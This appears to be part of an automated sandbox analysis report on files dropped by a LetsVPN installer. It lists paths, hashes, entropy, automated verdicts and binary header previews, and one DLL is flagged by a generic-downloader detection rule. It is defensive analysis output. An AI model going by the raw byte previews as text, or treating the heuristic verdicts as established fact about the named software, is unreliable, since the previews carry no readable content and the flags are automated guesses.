                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):282144
                                                                                                                                                                                                  Entropy (8bit):5.7076450783689925
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:CG0WgexKpGi8PnJcerXUaxX3HVeES4BEIqTTpX/4ormGpnaVTSGCkMhkEn7GAhCT:CJrycoB3HVeESME3pnaVTS1nh7hCa9A
                                                                                                                                                                                                  MD5:C5098FF401B766E6E554499D37D0B716
                                                                                                                                                                                                  SHA1:FD4C3DF050EC2B30740E2D62B27A9E375401F190
                                                                                                                                                                                                  SHA-256:B015C62C09B4033D0A4CAAE36F3A9804A8CEE2549145E199ADA5A9BF51095E0D
                                                                                                                                                                                                  SHA-512:04F3261ED8D59E5E8455D868CB7CEEF97466FB4FC57A98544024F53C4BA9D935E9441169F0705877CF3578F2EF4FC1B54921E9E15ECC70003C67452AE1393F01
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p3..........." ..0...... ........... ... ....... .......................`.......z....`.................................h...O.... ............... .. ....@......L................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\microsoft.identitymodel.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1109536
                                                                                                                                                                                                  Entropy (8bit):5.833531644079543
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:c1WtBetKEfrsial0WV1pqfy+Jp15yKn6Gg:vtBetKEfrsial0WV7215yKn6Gg
                                                                                                                                                                                                  MD5:9D0ED298898601B4BCE156C4B550FBAF
                                                                                                                                                                                                  SHA1:909623F8AE5CEA4527DC4E2C5D1D851F65702148
                                                                                                                                                                                                  SHA-256:491BD0614EBD705E0F7E1E085D30F201F4CD7AD2F886048BD597BFB46449A87C
                                                                                                                                                                                                  SHA-512:07D3B077AB08074EF9E5552180B73521C8E4FAD48A9AAAEED26BE9D1F0F7C8C88CEF211BD65DFF2FB9F8EE0093E40DEF34F6F714EBA562DF41FEB430D5E6B16F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&..\...........!......... ......N.... ........@.. ....................................@.....................................W.......0............... ...........P................................................ ............... ..H............text...T.... ...................... ..`.rsrc...0...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):94240
                                                                                                                                                                                                  Entropy (8bit):5.545893753117987
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:h2Ec05j4eAH64rh5fSt5T9nFcI94W83qKv/m+:wlK4eA7mDmW8j/N
                                                                                                                                                                                                  MD5:85898D7A2C1B25CDE3CCB2001B4AFAE4
                                                                                                                                                                                                  SHA1:232A32AED8550D07B36528053A59FD0F7E28C578
                                                                                                                                                                                                  SHA-256:DEB3D361EF42CAC93F602C17B7F3DF6E22CE79D10C111CDD7969BCCC3FDE5B40
                                                                                                                                                                                                  SHA-512:F697C0F5CFA384AC23EFDE1E0F5A2597E1415E3322B3C35983BA8A9A64CE016A241F1834CDC269CE41AB772E9FA227963BE388A6387F8056C451D8F5CF5A4E54
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dll, Author: Joe Security
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M..Z.........." ..0..8...........U... ...`....... ..............................N.....@..................................U..O....`..,............B.. ............................................................ ............... ..H............text....6... ...8.................. ..`.rsrc...,....`.......:..............@..@.reloc...............@..............@..B.................U......H.......P ...4..................,U......................................BSJB............v4.0.30319......l...|...#~.....d...#Strings....L3......#US.T3......#GUID...d3..x...#Blob......................3................................q.....2B........e$.M...,.M.....M...4.M...1.M...1.M..v..M...*.M...*.M....p...........................!.....).....1.....9.....A.....I.................................#.......+.......3.......;.J.....C.f.....K.f...................2.....................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\pl\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.83528093665527
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:cOss4wvEmF+4wpwlU+nACUOWe6lWwhqWOHlLf2KQcvBZ9ehfS+ShjmM6IGBkSNdn:cO/PArPq3b2KZBZ6S+ST6nkmn
                                                                                                                                                                                                  MD5:AAEDCF923306F04A5261B75D28B71EA7
                                                                                                                                                                                                  SHA1:58BAB697D7E8E5D578E7CDFF2BDE1DA2CB6B427C
                                                                                                                                                                                                  SHA-256:B254C31C34E91F5FE596E0A7DF41A9EB7D03BFBA37F4A8DC8E978E2C6A55769C
                                                                                                                                                                                                  SHA-512:78D29A03E4EC28D431BB44200DD1CE70080F57D1EF0319A880CCAC890C18198418EFECD778C8E665344DEC83A44809B9AEB14981E2535FE1DDBDEBB21EF46149
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I............." ..0..............9... ...@....... ..............................<.....@.................................x9..O....@...............$.. ....`......\9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................9......H.......P ...............%.......8......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................u...........].....].....]...A.]...^.].....]...*.].................o.....o.....o...).o...1.o...9.o...A.o...I.o...Q.o...Y.o.......................#.....+.....3.@...;.e...C.y...K.....S.@.....................Z.............

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\pt-BR\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.768445701848389
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:5qXQfVeSN32XFZWe6lWLMhqWOHlLf2KQcvBZ9Vd/VS+ShjmM6IGBkSHn:5g0VyiwEq3b2KZBZ1/VS+ST6nkMn
                                                                                                                                                                                                  MD5:ACF6193D5511378B7C02C03E00386CD1
                                                                                                                                                                                                  SHA1:7D9E11C2C99A4186E7EF5802BCED72315CAF162A
                                                                                                                                                                                                  SHA-256:1B728D394D07AB1CF12E5F70CD2FC558598F068057DF749980DFA02ACE97BFF7
                                                                                                                                                                                                  SHA-512:2C168D1F7F3B4EBC9FEE54689553858EFDBEEFC770F0B79F3F779951480E4CE64F1ADE20FE6C35708C4F555B8847F613BB6C3B15C577EA46AB72F08A5FFB294E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m............." ..0.............V9... ...@....... ..............................LB....@..................................9..O....@...............$.. ....`.......8............................................... ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................89......H.......P ...............%......h8......................................BSJB............v4.0.30319......l...D...#~......$...#Strings............#US.........#GUID...........#Blob......................3......................................2.......................x...........`.....`.....`...G.`...d.`.....`...0.`.................r.....r.....r...).r...1.r...9.r...A.r...I.r...Q.r...Y.r.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\ru\LetsPRO.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):80928
                                                                                                                                                                                                  Entropy (8bit):5.896904626678757
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:nGLNpA+N49BVKZUj7uecjqYGBzRuAN8J74zIg/m490sqXz2RgUWEw3qKm/mT:nG6DBduAN8J74zIg/m4HqXz2RgUWEwKw
                                                                                                                                                                                                  MD5:5CE4CBFEC968C625A856438C9E6FB160
                                                                                                                                                                                                  SHA1:9117A4411E22831E4363C92733AE84531FEE5D7C
                                                                                                                                                                                                  SHA-256:0D27592676D964F7F7AB27CA8DCACB7C5B5017A745C4749502BF2227E258859D
                                                                                                                                                                                                  SHA-512:A333D327FDD02BFA0C7EB4CA3A1602F3223ED292EBD5A085C40E6403DAE3DA329B0BA53DB6E7181E3436EB10C73FA247934067EA17025703406FA2773BD01A5D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....SMg...........!.................$... ...@....... ....................................@..................................#..W....@..(............... ....`....................................................... ............... ..H............text........ ...................... ..`.rsrc...(....@......................@..@.reloc.......`......................@..B.................#......H........ ..$...........P ..=...........................................9..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.S9.a.......dx.*PS.4.E.:....:C;..u..n."..iP...T..:K..c7... ..n......Mn...~..*k;.E....5:.J.[.].o..H..........1..&...+.@..s.............7.Tk[......ue./.N.M.i..:...v....F.b.b.S^m.........pE...k....D.../L.e..-..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\ru\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22560
                                                                                                                                                                                                  Entropy (8bit):6.793372115427383
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:i8knfHjuXOQWe6lWihqWOHlLf2KQcvBZ9SGES+ShjmM6IGBkSJO:PAuXO1lq3b2KZBZpES+ST6nkEO
                                                                                                                                                                                                  MD5:4178B66B86ED7539703EC80B6407F0F5
                                                                                                                                                                                                  SHA1:2B1088242E8C5169EB3CAD9399408990119B27D0
                                                                                                                                                                                                  SHA-256:6F015F7F2CCC29F50764D4482E6A3C91B9B4BA1346B76F64438AF0FC544C8D55
                                                                                                                                                                                                  SHA-512:BA87B81AFDAF53FE63C9161D075F5CE4F55C37A0AE967D492695B77E84E18D559B67063D73CD2922D4E1207078D8838A8AF9E424FC8859259A00CC64CCFFD2FE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(............." ..0.. ...........>... ...@....... ...................................@..................................>..O....@...............*.. ....`.......>............................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B.................>......H.......P ...............%..8....>......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................r...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-arm\native\e_sqlite3.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) ARMv7 Thumb, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):906272
                                                                                                                                                                                                  Entropy (8bit):7.132105604057801
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:soXErM5iD28EYQg502GXoU5C0ParRvbLk:tXriD28xj52X7arpk
                                                                                                                                                                                                  MD5:692EAC9101A2F178CCF4F3AC8D4E69A7
                                                                                                                                                                                                  SHA1:6E493B2436892DCCC591EE278B3426DB484DCF8D
                                                                                                                                                                                                  SHA-256:D2CC43A027D8AAA688D846665DF8E24F4D3AFAD8C51BC364C47D7FB8C3E596CD
                                                                                                                                                                                                  SHA-512:4E46AB74F40FB20A64535B97AB2473B8F5FFC91520B8B71A7CCC2F4754DD4A516A37C6E0009F8B9A10323445F8EAF2C042B58ED858B12C3769DA46850AB3D099
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`^ .$?N.$?N.$?N..WK..?N..WJ.*?N..WO.'?N.$?O..?N.%RK.9?N.%RJ.)?N.%RM.*?N..RJ.&?N..RN.%?N..R..%?N..RL.%?N.Rich$?N.........PE........^.........."!........................ .......................................J....@A............................"......(............@..hO...... ........?..0l..T............................l............... ...............................text............................... ..`.rdata..B.... ......................@..@.data...<J.......>..................@....pdata..hO...@...P..................@..@.rsrc................d..............@..@.reloc...?.......@...f..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-x64\native\e_sqlite3.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1314848
                                                                                                                                                                                                  Entropy (8bit):6.548345207582786
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:UwDD7AuRNZxBNzFlbZcN16AL9hwYi20TAg7wkPxl:UIDbR1L/m9KYixcWH
                                                                                                                                                                                                  MD5:3FD1AFC37E19603D56A261E4AA8DE93B
                                                                                                                                                                                                  SHA1:AD3573E1D2DDECF1128ED06195B4BC0F3E2C1949
                                                                                                                                                                                                  SHA-256:6010694F42A708F29ADBDC9D9C9C7ADBA1E72827FAC30110591FDB238D16C837
                                                                                                                                                                                                  SHA-512:8DAE7E662234270B555FDCFB77043353441A122D640CCE9B62C310C577967438D47D4FD69BB48A03277313F0A98FC34322EF7082BF8C56CE0D5AD10D647E3E5D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.[.~.5.~.5.~.5.%.1.u.5.%.6.v.5.%.0...5.%.4.}.5.~.4...5...0.`.5...1.p.5...6.v.5..1.|.5..5...5......5..7...5.Rich~.5.........PE..d.....^.........." ................P........................................P............`A........................................ ...."..(...(.... .......@..h....... ....0..........T............................................................................text............................... ..`.rdata..............................@..@.data....i.......T..................@....pdata..h....@......................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-x86\native\e_sqlite3.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1030176
                                                                                                                                                                                                  Entropy (8bit):6.751228097849462
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:0BvdKGB6hOsMxCmy+rAnpyAqhTz3RzVNUOxKKoSk:0vdKGBmWNAnpc3Rz1KKoSk
                                                                                                                                                                                                  MD5:77EA9B2FD3A7D8787FB80B32F7162A4A
                                                                                                                                                                                                  SHA1:DAF5B3C6B2EDA96C86BE34B57E77D0021A51543D
                                                                                                                                                                                                  SHA-256:3E7F79471A84B3505B781DDA0BDD33A8F5AD5A18C232D724F7E477D92E252DCF
                                                                                                                                                                                                  SHA-512:B91A084B30ABA93F0F10D4165E654308842BCA4152D13B057025684B2BB2963F272473D5A3BE4E0C0A9A3B4C7A39E3876E87F99869AA09252E6E9E71E6CA0C6B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........E......................#.....................2...........................z.......z.......z.......z.......Rich............................PE..L.....^...........!.....R...B..............p...........................................@A........................ ...."..(...(....`.................. ....p...\......T...........................(...@............p...............................text....Q.......R.................. ..`.rdata..z....p.......V..............@..@.data....K.......>..................@....rsrc........`.......*..............@..@.reloc...\...p...^...,..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\tr\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.7465535147228035
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:8fH3xC8M83We6lWWhqWOHlLf2KQcvBZ9qxkS+ShjmM6IGBkSP:Wc8M8Ylq3b2KZBZ8kS+ST6nk8
                                                                                                                                                                                                  MD5:06870433B0EE21628CFBE438EDC9B057
                                                                                                                                                                                                  SHA1:F388968FC210531D664090E008A5D44F42931727
                                                                                                                                                                                                  SHA-256:08892141E0429AE283F7AC6B1702572D809828724F812B7AB7F7B248036053E4
                                                                                                                                                                                                  SHA-512:5CFE6C20C192C4FF02A6831B4CE504BEAC64A075008C74503D8EAF3759596CF47346E75B7E98307C441945CA5A24305A34706EFEF5CC68F1B4E9F97126347E85
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S............." ..0.............J8... ...@....... ...............................h....@..................................7..O....@...............$.. ....`.......7............................................... ............... ..H............text...P.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................,8......H.......P ...............%......\7......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................u...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@.....................r.............

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\x64\WebView2Loader.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):139296
                                                                                                                                                                                                  Entropy (8bit):6.203667467899164
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:ypMrTPTNy56J4JQSfB6yRkkGvaYhfls6DREtfw6aQ5ck/e:y6PTQ6Ga+BtakGvVEtC1X
                                                                                                                                                                                                  MD5:98FF7764DA6B97CB3B8B26EECA105F71
                                                                                                                                                                                                  SHA1:28F319FD5A81B3B07FD0F329F7FD675A0E557ED0
                                                                                                                                                                                                  SHA-256:A04EBFCC5F4C641EAEF0DA0FCEB4D0AD65E91A636C723B8F5F4F41F1C4C1F2CD
                                                                                                                                                                                                  SHA-512:2D7D578069EB269855611074BEF654E03C7586F6943AD176B61FC4D3A77FC1402AF89E3F276D562951C9BCA72DC4FF40D3A03905947997D10D9CAA3ADBCE62D1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......`.........." ................P9.......................................p......a.....`A........................................G.......9...(....P.................. ....`......D...........................(....1..0..................8........................text............................... ..`.rdata.......0......................@..@.data...............................@....pdata..............................@..@.00cfg..(.... ......................@..@.tls.........0......................@..._RDATA.......@......................@..@.rsrc........P......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\x86\WebView2Loader.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):113184
                                                                                                                                                                                                  Entropy (8bit):6.538622877633965
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:blzhJmad5M+ekPfJFVwKrSDnuP7HCt+/NyIDfEtPsn/j481sOV/L:blzqaHM+eCTrSDuP7ZbEtUnr51sON
                                                                                                                                                                                                  MD5:37C91BE50E2A9A003AA88E3E91A8BE65
                                                                                                                                                                                                  SHA1:5B728E04200CB5FFDB5A7D904C8AAE7A7FB9AC59
                                                                                                                                                                                                  SHA-256:03E6F5D7A82CD0A22FEEB48983044F8664C2DD319C8942518B224CFF26BC7EAD
                                                                                                                                                                                                  SHA-512:949230C263BD106CAC34CBE716EEAFE0181329DB381FA9EA435EEC432EF4F79886BEAFA3CE6DA996931EB2112560ADAD7D69DBFF12311F56196C52CFB427B9D1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......`.........."!.................4..............................................*G....@A.........................k.......l..(....................... .......L...Ph.......................f......`...............8n..8....i.......................text...e........................... ..`.rdata...k.......l..................@..@.data................d..............@....00cfg...............n..............@..@.tls.................p..............@....voltbl.H............r...................rsrc................t..............@..@.reloc..L............z..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\zh-CN\LetsPRO.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):61984
                                                                                                                                                                                                  Entropy (8bit):6.282103236061246
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:k9DGL8sTvXOGdWRsd+rxGLhrI72RlDn5D4eH4Sq3b2KZBZ2S+ST6nki:kVGL8sTfLWRO+rUhrI7UT5DK93qKM/m8
                                                                                                                                                                                                  MD5:4B265A80F0C5DE434A73E76A2B20632C
                                                                                                                                                                                                  SHA1:E1A7664DE00AD7A0B0BF4054E22625FF6FAD7EB2
                                                                                                                                                                                                  SHA-256:C343E533D53557F6F50721F511559FCC94939CB56EEDCAA1E2299CBB2E4D2D14
                                                                                                                                                                                                  SHA-512:35B24E8CEB5310271E8CE12A885F08BE7BA720050837525877FE280893176E379B2EA2DEB47D42E030B2A787C850C58C1AB647E3B3B7DBE9F09FD0E4DE9B3CD4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....SMg...........!..................... ........... ....................... .......\....@.....................................S.......(............... ............................................................ ............... ..H............text........ ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B........................H.......p...(...........P .............................................................lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.S9.a.......dx.*PS.4.E.:....:C;..u..n."..iP...T..:K..c7... ..n......Mn...~..*k;.E....5:.J.[.].o..H..........1..&...+.@..s.............7.Tk[......ue./.N.M.i..:...v....F.b.b.S^m.........pE...k....D.../L.e..-..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\zh-HK\LetsPRO.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):62496
                                                                                                                                                                                                  Entropy (8bit):6.251413403033582
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:oGL8sTxyHu6RjvYDGE97we8oEN3qKK/ms:oGhVENm/7
                                                                                                                                                                                                  MD5:80FE3928FBBC68EAE87A7EC53B84CA57
                                                                                                                                                                                                  SHA1:0AECA1C566BA00782820A14B7B262E1191617D5F
                                                                                                                                                                                                  SHA-256:2DB64AE25EFEFC7208DEED114E4AB326C4718A7ADC78BF92642E4F3EDDD18610
                                                                                                                                                                                                  SHA-512:506946BD007C4BFB4777E7A52959CF6E078F6090DE1BCF077A79AAE437CA0F908842C0B89C114D42EB5223B188C3429CB788510B0050ACA92137D1DFE4195BF7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....SMg...........!................>.... ........... ....................... ............@.....................................S.......(............... ............................................................ ............... ..H............text...D.... ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B................ .......H...........(...........P ..p...........................................l..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.S9.a.......dx.*PS.4.E.:....:C;..u..n."..iP...T..:K..c7... ..n......Mn...~..*k;.E....5:.J.[.].o..H..........1..&...+.@..s.............7.Tk[......ue./.N.M.i..:...v....F.b.b.S^m.........pE...k....D.../L.e..-..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\zh-Hans\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20512
                                                                                                                                                                                                  Entropy (8bit):6.968045952031746
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:jX3HhVhLu4y8VWe6lWihqWOHlLf2KQcvBZ96I03S+ShjmM6IGBkSF:z3h/aVq3b2KZBZ303S+ST6nkC
                                                                                                                                                                                                  MD5:949581689D35CF1D5EC2D231DAA57041
                                                                                                                                                                                                  SHA1:D6797330D56FBACE397073A8877119BB24F2E83D
                                                                                                                                                                                                  SHA-256:C7B7582C55F44F2DBF7752D181041DE94319DC91CED63031328D2F5A8AAB7C19
                                                                                                                                                                                                  SHA-512:73401AB7C27336C2C0FB284552D5AB2B03F1E0EE410E971FFD684C88D4A36EF213B14A3605B73336050C4B9FD918E7C86CBF8CE26B5F40809D8507BB3567F3B5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R]..........." ..0..............7... ...@....... ....................................@.................................h7..O....@...............".. ....`......L7............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................7......H.......P ...............%.......6......................................BSJB............v4.0.30319......l...D...#~......(...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................r...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

